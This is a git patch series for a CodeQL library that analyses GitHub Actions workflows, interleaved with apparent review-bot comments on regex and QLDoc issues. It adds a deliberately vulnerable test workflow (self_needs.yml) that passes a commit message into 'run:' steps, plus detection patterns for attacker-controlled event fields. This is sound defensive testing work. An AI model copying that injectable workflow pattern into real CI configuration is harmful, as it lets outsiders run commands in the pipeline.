"\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b", + + "\\bgithub\\.event\\.check_run\\.head_sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", + "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", ], _, _) ) } From 3e2dffce8be696ae9a22b6605192aca3f85c728b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:57:43 +0100 Subject: [PATCH 100/707] Rename ContextExpression to SimpleReferenceExpression --- ql/lib/codeql/actions/Ast.qll | 14 ++--- ql/lib/codeql/actions/ast/internal/Ast.qll | 53 ++++++++++++------- .../dataflow/internal/DataFlowPrivate.qll | 2 +- 3 files changed, 42 insertions(+), 27 deletions(-) 
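Review bot: The eighteen new `check_suite` and `check_run` patterns carry no trailing comment, while every earlier entry in the `containsHeadRef` list names what the field holds (for example `// The SHA of the head commit.`); adding the same one-line comments to the new entries keeps the list self-explanatory for whoever extends it next. The blank separator lines inside the string list are, as far as I can see, new to this file's style; grouping by a comment line such as `// check_suite payload` instead would match the existing entries. The `containsHeadRef` predicate begins outside the hunk.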
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 19d1924731ab..70424a46f95b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -226,20 +226,20 @@ class Run extends Step instanceof RunImpl { Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } -abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl { +abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { string getFieldName() { result = super.getFieldName() } AstNode getTarget() { result = super.getTarget() } } -class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { } +class StepsExpression extends SimpleReferenceExpression instanceof StepsExpressionImpl { } -class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { } +class NeedsExpression extends SimpleReferenceExpression instanceof NeedsExpressionImpl { } -class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { } +class JobsExpression extends SimpleReferenceExpression instanceof JobsExpressionImpl { } -class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { } +class InputsExpression extends SimpleReferenceExpression instanceof InputsExpressionImpl { } -class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } +class EnvExpression extends SimpleReferenceExpression instanceof EnvExpressionImpl { } -class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { } +class MatrixExpression extends SimpleReferenceExpression instanceof MatrixExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9a97a1c45b43..1f206c964eba 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -19,24 +19,18 @@ int partialLineLengthSum(string text, int i) { result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) } -/** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ -string getASimpleReferenceExpression(YamlString s, int offset) { +string getADelimitedExpression(YamlString s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) } private newtype TAstNode = TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { - raw = getASimpleReferenceExpression(value, exprOffset) and + raw = getADelimitedExpression(value, exprOffset) and exists(YamlMapping m | ( exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) 
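Review bot: The new `getADelimitedExpression` has no QLDoc (the block that used to sit here was moved, not replaced), and its pattern `\\$\\{\\{\\s*.*\\s*\\}\\}` is greedy: on a value holding two expressions such as `${{ a }} x ${{ b }}` the `.*` runs to the last `}}` and yields one match spanning both, so the second expression is never modelled on its own. A reluctant or negated-class body for the inner part avoids that. A short doc such as `/** Gets a \`${{ ... }}\` expression found in \`s\`, with \`offset\` bound to its start. */` would also help. The `TExpressionNode` branch that calls it continues past the hunk.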
@@ -789,11 +783,29 @@ class RunImpl extends StepImpl { } } +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +bindingset[s] +string getASimpleReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ -abstract class ContextExpressionImpl extends ExpressionImpl { +abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); @@ -829,7 +841,7 @@ private string wrapRegexp(string regex) { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` */ -class StepsExpressionImpl extends ContextExpressionImpl { +class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string stepId; string fieldName; 
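Review bot: The QLDoc copied onto the new `getASimpleReferenceExpression` is stale: it still says it holds when `${{ e }}` is evaluated within a YAML string, and the inline comment still talks about matching `${{...}}`, yet the predicate now takes a plain `string`, trims it and searches for runs of `[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+` with no delimiters. Because `regexpFind` returns any such run, the characteristic predicate `exists(getASimpleReferenceExpression(expression, _))` on `SimpleReferenceExpressionImpl` holds for any expression containing a single letter, so it does not restrict the class to simple references as the doc promises; if that restriction is intended, an anchored check such as `expression.trim().regexpMatch("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+")` would enforce it. Rewrite the doc to describe what the predicate actually returns. The `expression` field is declared outside the hunk.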
@@ -842,7 +854,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + this.getEnclosingJob() = result.getEnclosingJob() and result.(StepImpl).getId() = stepId } } @@ -852,7 +864,7 @@ class StepsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ needs.job1.outputs.foo}}` */ -class NeedsExpressionImpl extends ContextExpressionImpl { +class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { JobImpl neededJob; string fieldName; @@ -866,7 +878,10 @@ class NeedsExpressionImpl extends ContextExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob().getANeededJob() = neededJob and + ( + this.getEnclosingJob().getANeededJob() = neededJob or + this.getEnclosingJob() = neededJob + ) and ( // regular jobs neededJob.getOutputs() = result @@ -882,7 +897,7 @@ class NeedsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) */ -class JobsExpressionImpl extends ContextExpressionImpl { +class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string jobId; string fieldName; @@ -908,7 +923,7 @@ class JobsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class InputsExpressionImpl extends ContextExpressionImpl { +class InputsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; InputsExpressionImpl() { 
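Review bot: The new disjunct `this.getEnclosingJob() = neededJob` in `NeedsExpressionImpl.getTarget` lets a `needs.<job>` expression resolve to the very job it appears in, which is not how the `needs` context is normally populated, and nothing explains why; a comment such as `// also resolve self-references (needs.<job> inside <job>) so outputs fed by the job's own steps are tracked` would record the intent. The switch from a same-file check to `this.getEnclosingJob() = result.getEnclosingJob()` in `StepsExpressionImpl.getTarget` is a good tightening, since the `steps` context is scoped to a job. `NeedsExpressionImpl.getTarget` continues past its hunk.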
@@ -933,7 +948,7 @@ class InputsExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ env.foo }}` */ -class EnvExpressionImpl extends ContextExpressionImpl { +class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { @@ -956,7 +971,7 @@ class EnvExpressionImpl extends ContextExpressionImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixExpressionImpl extends ContextExpressionImpl { +class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; MatrixExpressionImpl() { diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index bda55da5c82a..f1657717e04f 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -271,7 +271,7 @@ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(ContextExpression access | + exists(SimpleReferenceExpression access | ( access instanceof NeedsExpression or access instanceof StepsExpression or From 8e2c1a4f4ed140e5aae014936a19039234f81dc1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 11:58:07 +0100 Subject: [PATCH 101/707] Expose predicates to check local flow --- .../actions/dataflow/internal/DataFlowPublic.qll | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index dbae273151b0..8e8ed5d92802 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
@@ -174,3 +174,16 @@ class FieldContent extends Content, TFieldContent {
 override string toString() { result = name }
 }
+
+predicate hasLocalFlow(Node n1, Node n2) {
+ simpleLocalFlowStep(n1, n2) or
+ exists(ContentSet c | ctxFieldReadStep(n1, n2, c))
+}
+
+predicate hasLocalFlowExpr(AstNode n1, AstNode n2) {
+ exists(Node dn1, Node dn2 |
+ dn1.asExpr() = n1 and
+ dn2.asExpr() = n2 and
+ hasLocalFlow(dn1, dn2)
+ )
+}
From 03277cc24bfa901ad253f2893cc4dbb00e9ad16d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 11:58:44 +0100
Subject: [PATCH 102/707] Add test for self-referencing jobs
---
 .../CWE-094/.github/workflows/self_needs.yml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
new file mode 100644
index 000000000000..afd39605bb31
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml
@@ -0,0 +1,20 @@
+name: Test
+
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ test1:
+ runs-on: ubuntu-22.04
+ outputs:
+ job_output: ${{ steps.source.outputs.value }}
+ steps:
+ - id: source
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ github.event['head_commit']['message'] }}
+ find: 'foo'
+ replace: ''
+ - run: ${{ steps.source.outputs.value }}
+ - run: ${{ needs.test1.outputs.job_output }}
From 7160f08222691a9182870200a6451b353604d0d3 Mon Sep 17 00:00:00 2001
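Review bot: `hasLocalFlow` and `hasLocalFlowExpr` are new public predicates with no QLDoc, while the neighbouring `FieldContent` class is documented; add a line above each, e.g. `/** Holds if a single local flow step (simple step or context field read) leads from \`n1\` to \`n2\`. */` and `/** Holds if the data-flow nodes of AST nodes \`n1\` and \`n2\` are joined by one local flow step. */`. Both cover exactly one step, not transitive local flow, so the names slightly over-promise; if transitive reachability is what callers want, the body needs `+` closure or a recursive definition. Both predicates are fully inside the hunk.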
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:03:40 +0100 Subject: [PATCH 103/707] Update ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- .../query-tests/Security/CWE-829/.github/workflows/auto_ci.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index cb20cfe629bf..28ffab637f03 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -68,7 +68,7 @@ jobs: uses: actions/checkout@v3 with: fetch-depth: 0 - ref: ${{ github.event.pull_request.head.ref }} + ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - name: Set up Python ${{ matrix.python-version }} From 3150f24d3fc3c283df4c372925edc97800092b2d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 12:21:16 +0100 Subject: [PATCH 104/707] Update tests and fix regexp --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 11 +++++++++++ .../Security/CWE-094/ExpressionInjection.expected | 13 +++++++++++++ 3 files changed, 26 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 1f206c964eba..ffe85b16f933 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -24,8 +24,8 @@ string getADelimitedExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*.*\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*.*\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index dfed1edb40a2..aa9d9ae2fc43 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index d22e9833f521..d4fd27b18d4f 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -39,6 +39,11 @@ edges | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | 
@@ -162,6 +167,12 @@ nodes | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | 
@@ -259,6 +270,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 9ca1ac5bb9283d413eefc3bbb686949f69d90a4c Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 12:58:02 +0100
Subject: [PATCH 105/707] Fix expression regexp
---
 ql/lib/codeql/actions/ast/internal/Ast.qll | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index ffe85b16f933..084474b40204 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -24,8 +24,9 @@ string getADelimitedExpression(YamlString s, int offset) {
 // not just the last (greedy match) or first (reluctant match).
 result =
 s.getValue()
- .regexpFind("\\$\\{\\{\\s*[^\\}]+\\s*\\}\\}", _, offset)
- .regexpCapture("(\\$\\{\\{\\s*[^\\}]+\\s*\\}\\})", 1)
+ .regexpFind("\\$\\{\\{(?:[^}]|}(?!}))*\\}\\}", _, offset)
+ .regexpCapture("(\\$\\{\\{(?:[^}]|}(?!}))*\\}\\})", 1)
+ .trim()
 }
 private newtype TAstNode =
From 35df9519e14a43946cca042b4286477f95c96b3f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Thu, 14 Mar 2024 12:58:47 +0100
Subject: [PATCH 106/707] Support more untrusted checkout cases
---
 ql/src/Security/CWE-829/UntrustedCheckout.ql | 22 ++--
 .../issue_comment_3rd_party_action.yml | 53 ++++++++
 .../workflows/issue_comment_direct.yml | 46 +++++++
 .../workflows/issue_comment_heuristic.yml | 50 ++++++++
 .../workflows/issue_comment_octokit.yml | 114 ++++++++++++++++++
 .../CWE-829/UnpinnedActionsTag.expected | 6 +
 .../CWE-829/UntrustedCheckout.expected | 9 ++
 7 files changed, 293 insertions(+), 7 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml
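Review bot: The appended `.trim()` is a no-op: the captured group is anchored by `\\$\\{\\{` at one end and `\\}\\}` at the other, so the result can never carry leading or trailing whitespace, and the call only suggests that trimming of the inner expression happens here when it does not. Drop it, or if the intent is to normalise the inner text, do that where the delimiters are stripped. The body of `getADelimitedExpression` is fully inside the hunk.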
diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 4a0a4b6ade6c..a24c80a2f607 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -14,6 +14,7 @@ */ import actions +import codeql.actions.DataFlow /** An If node that contains an actor, user or label check */ class ControlCheck extends If { @@ -23,6 +24,7 @@ class ControlCheck extends If { .regexpFind([ "\\bgithub\\.actor\\b", // actor "\\bgithub\\.triggering_actor\\b", // actor + "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user "\\bgithub\\.event\\.pull_request\\.labels\\b", // label "\\bgithub\\.event\\.label\\.name\\b" // label 
